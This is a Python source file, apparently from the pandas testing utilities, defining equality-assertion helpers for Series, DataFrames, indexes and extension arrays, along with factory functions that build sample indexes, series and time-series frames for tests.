def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""
Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes"
)
else:
try:
lc = left.categories.sort_values()
rc = right.categories.sort_values()
except TypeError:
# e.g. '<' not supported between instances of 'int' and 'str'
lc, rc = left.categories, right.categories
assert_index_equal(lc, rc, obj=f"{obj}.categories")
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""
Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
kwargs = {}
if left._left.dtype.kind in ["m", "M"]:
# We have a DatetimeArray or TimedeltaArray
kwargs["check_freq"] = False
assert_equal(left._left, right._left, obj=f"{obj}.left", **kwargs)
    assert_equal(left._right, right._right, obj=f"{obj}.right", **kwargs)
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray", check_freq=True):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
if check_freq:
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray", check_freq=True):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
if check_freq:
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None, index_values=None):
__tracebackhide__ = True
msg = f"""{obj} are different
{message}"""
if isinstance(index_values, np.ndarray):
msg += f"\n[index]: {pprint_thing(index_values)}"
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg += f"""
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
index_values=None,
):
"""
    Check that two 'np.ndarray' objects are equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both a and b are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
index_values : numpy.ndarray, default None
optional index (shared by both left and right), used in output.
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape
)
diff = 0
for left_arr, right_arr in zip(left, right):
# count up differences
if not array_equivalent(left_arr, right_arr, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right, index_values=index_values)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left,
right,
check_dtype=True,
index_values=None,
check_less_precise=no_default,
check_exact=False,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
):
"""
Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare.
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
index_values : numpy.ndarray, default None
Optional index (shared by both left and right), used in output.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default False
Whether to compare number exactly.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
Examples
--------
>>> from pandas.testing import assert_extension_array_equal
>>> a = pd.Series([1, 2, 3, 4])
>>> b, c = a.array, a.array
>>> assert_extension_array_equal(b, c)
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if (
isinstance(left, DatetimeLikeArrayMixin)
and isinstance(right, DatetimeLikeArrayMixin)
and type(right) == type(left)
):
# Avoid slow object-dtype comparisons
# np.asarray for case where we have a np.MaskedArray
assert_numpy_array_equal(
np.asarray(left.asi8), np.asarray(right.asi8), index_values=index_values
)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(
left_na, right_na, obj="ExtensionArray NA mask", index_values=index_values
)
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(
left_valid, right_valid, obj="ExtensionArray", index_values=index_values
)
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
obj="ExtensionArray",
index_values=index_values,
)
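# Illustrative sketch (not part of the original module): nullable extension
# arrays are compared via a separate NA-mask check followed by a check of the
# remaining valid values, so pd.NA positions must line up exactly.
# Hypothetical helper name.
def _demo_assert_extension_array_equal():
    import pandas as pd
    left = pd.array([1, 2, None], dtype="Int64")
    right = pd.array([1, 2, None], dtype="Int64")
    # Same dtype, same NA mask, same valid values -> passes.
    assert_extension_array_equal(left, right)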
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=no_default,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_category_order=True,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_category_order : bool, default True
Whether to compare category order of internal Categoricals.
.. versionadded:: 1.0.2
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
.. versionadded:: 1.2.0
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
Examples
--------
>>> from pandas.testing import assert_series_equal
>>> a = pd.Series([1, 2, 3, 4])
>>> b = pd.Series([1, 2, 3, 4])
>>> assert_series_equal(a, b)
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
if check_flags:
assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
if check_freq and isinstance(left.index, (pd.DatetimeIndex, pd.TimedeltaIndex)):
lidx = left.index
ridx = right.index
assert lidx.freq == ridx.freq, (lidx.freq, ridx.freq)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left.dtype)
and is_categorical_dtype(right.dtype)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact and is_numeric_dtype(left.dtype) and is_numeric_dtype(right.dtype):
# Only check exact if dtype is numeric
assert_numpy_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif check_datetimelike_compat and (
needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype)
):
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left._values).equals(Index(right._values)):
msg = (
f"[datetimelike_compat=True] {left._values} "
f"is not equal to {right._values}."
)
raise AssertionError(msg)
elif is_interval_dtype(left.dtype) and is_interval_dtype(right.dtype):
assert_interval_array_equal(left.array, right.array)
elif is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif is_extension_array_dtype(left.dtype) and is_extension_array_dtype(right.dtype):
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
elif is_extension_array_dtype_and_needs_i8_conversion(
left.dtype, right.dtype
) or is_extension_array_dtype_and_needs_i8_conversion(right.dtype, left.dtype):
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
elif needs_i8_conversion(left.dtype) and needs_i8_conversion(right.dtype):
# DatetimeArray or TimedeltaArray
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
else:
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(
left._values,
right._values,
obj=f"{obj} category",
check_category_order=check_category_order,
)
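# Illustrative sketch (not part of the original module): check_dtype=False
# allows Series holding the same values in different dtypes to compare equal,
# mirroring the dtype example in the assert_frame_equal docstring.
# Hypothetical helper name.
def _demo_assert_series_equal():
    import pandas as pd
    left = pd.Series([1, 2, 3])          # int64
    right = pd.Series([1.0, 2.0, 3.0])   # float64
    # Would raise with the default check_dtype=True; passes when relaxed.
    assert_series_equal(left, right, check_dtype=False)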
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=no_default,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
    differences. It is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
        (same as in columns) - the same labels must correspond to the same data.
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}"
)
if check_flags:
assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
check_order=not check_like,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
check_order=not check_like,
rtol=rtol,
atol=atol,
obj=f"{obj}.columns",
)
if check_like:
left, right = left.reindex_like(right), right
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
check_freq=check_freq,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
rtol=rtol,
atol=atol,
)
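# Illustrative sketch (not part of the original module): check_like=True
# ignores row/column order as long as the same labels map to the same data.
# Hypothetical helper name.
def _demo_assert_frame_equal_check_like():
    import pandas as pd
    left = pd.DataFrame({"a": [1, 2], "b": [3, 4]}, index=["x", "y"])
    right = left.loc[["y", "x"], ["b", "a"]]  # same data, reordered labels
    assert_frame_equal(left, right, check_like=True)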
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
if isinstance(left, (pd.DatetimeIndex, pd.TimedeltaIndex)):
assert left.freq == right.freq, (left.freq, right.freq)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
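# Illustrative sketch (not part of the original module): assert_equal
# dispatches on the type of the left argument, so a single call site can
# compare Index, Series, DataFrame, pandas arrays, or plain ndarrays.
# Hypothetical helper name.
def _demo_assert_equal_dispatch():
    import numpy as np
    import pandas as pd
    assert_equal(pd.Index([1, 2, 3]), pd.Index([1, 2, 3]))
    assert_equal(pd.Series([1.0, 2.0]), pd.Series([1.0, 2.0]))
    assert_equal(np.array([1, 2]), np.array([1, 2]))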
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
expected = pd.array(expected)
elif box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
# for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
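# Illustrative sketch (not part of the original module): box_expected wraps a
# raw expected value in the container class a parametrized test is exercising.
# Hypothetical helper name.
def _demo_box_expected():
    import numpy as np
    import pandas as pd
    data = [1, 2, 3]
    assert isinstance(box_expected(data, pd.Series), pd.Series)
    assert isinstance(box_expected(data, pd.Index), pd.Index)
    # DataFrame boxing goes through a single-column frame, transposed by
    # default into a single row.
    assert box_expected(data, pd.DataFrame).shape == (1, 3)
    assert isinstance(box_expected(data, np.ndarray), np.ndarray)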
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(left, right):
"""
Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
left_index = left.sp_index
right_index = right.sp_index
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
# Just ensure a
pass
assert_attr_equal("fill_value", left, right)
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense())
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def is_extension_array_dtype_and_needs_i8_conversion(left_dtype, right_dtype) -> bool:
"""
    Checks that we have the combination of an ExtensionArray dtype and
    a dtype that should be converted to int64.
Returns
-------
bool
Related to issue #37609
"""
return is_extension_array_dtype(left_dtype) and needs_i8_conversion(right_dtype)
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
return pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
    Returns
    -------
    DataFrame
        A DataFrame with a DatetimeIndex and the following columns:
        * name : object dtype with string names
        * id : int dtype with Poisson-distributed integer ids
        * x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
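# Illustrative sketch (not part of the original module): fixing the seed makes
# the generated frame reproducible across calls. Hypothetical helper name.
def _demo_make_timeseries():
    df1 = _make_timeseries(start="2000-01-01", end="2000-01-10", freq="1D", seed=1)
    df2 = _make_timeseries(start="2000-01-01", end="2000-01-10", freq="1D", seed=1)
    # Columns come out sorted by name; the same seed yields identical data.
    assert list(df1.columns) == ["id", "name", "x", "y"]
    assert_frame_equal(df1, df2)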
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k=10):
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
# pandas\_testing.py:1986: error: Cannot call function of unknown type
yield make_index_func(k=k) # type: ignore[operator]
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
